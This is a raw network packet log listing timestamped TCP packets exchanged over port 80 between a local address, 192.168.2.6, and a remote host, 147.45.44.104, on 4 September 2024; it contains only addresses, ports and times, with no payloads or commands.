Sep 4, 2024 17:37:07.171678066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171679974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171689034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171699047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171700001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171711922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.171711922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171737909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.171761990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172096968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172108889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172120094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172167063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172168016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172231913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172244072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172254086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172271013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172276974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172300100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172322035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172360897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172372103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172382116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172393084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172403097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172408104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172414064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172424078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172426939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172435999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172446966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172455072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172458887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172468901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172477007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.172501087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.172523022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173098087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173109055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173122883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173127890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173134089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173144102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173149109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173158884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173162937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173171043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173181057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173192024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173193932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173202991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173209906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173213959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173224926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173234940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173235893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173248053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173259020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173264027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173270941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173276901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173300982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173326015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173826933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173872948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.173960924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173970938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173981905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.173993111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.174004078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.174005032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.174015999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.174022913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.174026966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.174038887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.174041986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.174067020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.174077988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.177674055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.177720070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.177752972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.177767038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.177794933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.177918911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.177949905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.177959919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.177970886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.177983999 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.177994967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.178029060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.241724968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241774082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.241801977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241811991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241822004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241827965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241836071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.241838932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241851091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.241853952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241883039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.241900921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.241902113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.241935015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.245182037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.245264053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.245275021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.245286942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.245322943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.245333910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.245373011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.245383978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.245393038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.245404959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.245413065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.245445967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256352901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256376028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256392956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256416082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256439924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256515980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256527901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256539106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256550074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256562948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256588936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256728888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256740093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256750107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256772041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256788015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256848097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256886959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256910086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256922007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256931067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.256953955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.256978035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257067919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257080078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257112026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257127047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257138014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257148027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257159948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257163048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257170916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257183075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257188082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257211924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257229090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257452965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257471085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257482052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257497072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257507086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257529974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257596970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257607937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257618904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257630110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257642031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257652998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257664919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257668972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257675886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257687092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257688999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257707119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257724047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257932901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257945061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257956028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.257982016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.257992983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258013964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258027077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258037090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258048058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258050919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258060932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258070946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258074999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258085966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258096933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258099079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258107901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258136988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258558989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258569956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258579969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258590937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258601904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258601904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258630991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258646965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258836985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258848906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258862972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258873940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258882046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258884907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258903027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258915901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258917093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258929014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258939981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258940935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258949995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258960962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258961916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258975983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258985043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.258987904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.258996010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259006977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259011984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259021997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259032965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259037018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259044886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259064913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259094000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259808064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259818077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259826899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259838104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259848118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259856939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259860039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259871006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259881973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259884119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259893894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259902954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259911060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259923935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259932041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259933949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.259962082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.259985924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260389090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260401964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260411978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260422945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260435104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260436058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260447025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260457993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260464907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260476112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260497093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260497093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260500908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260514021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260525942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260526896 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260539055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.260556936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260585070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.260998011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261008978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261019945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261032104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261043072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261044979 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.261054993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261068106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261070013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.261079073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261090040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261100054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.261101961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261115074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261120081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.261127949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261137009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.261140108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261149883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.261153936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.261178970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.261203051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.262165070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.267329931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282015085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282038927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282052040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282068968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282099962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282099962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282159090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282171965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282182932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282188892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282198906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282228947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282258987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282392025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282406092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282416105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282428026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282433987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282440901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282458067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282476902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282675028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282685995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282696962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282707930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282720089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282725096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282732964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282748938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282773018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282921076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282938957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282949924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282958031 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282962084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.282980919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.282996893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283138037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283149004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283159018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283169985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283181906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283184052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283204079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283226013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.283430099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.283441067 CEST	80	49719	147.45.44.104	192.168.2.6
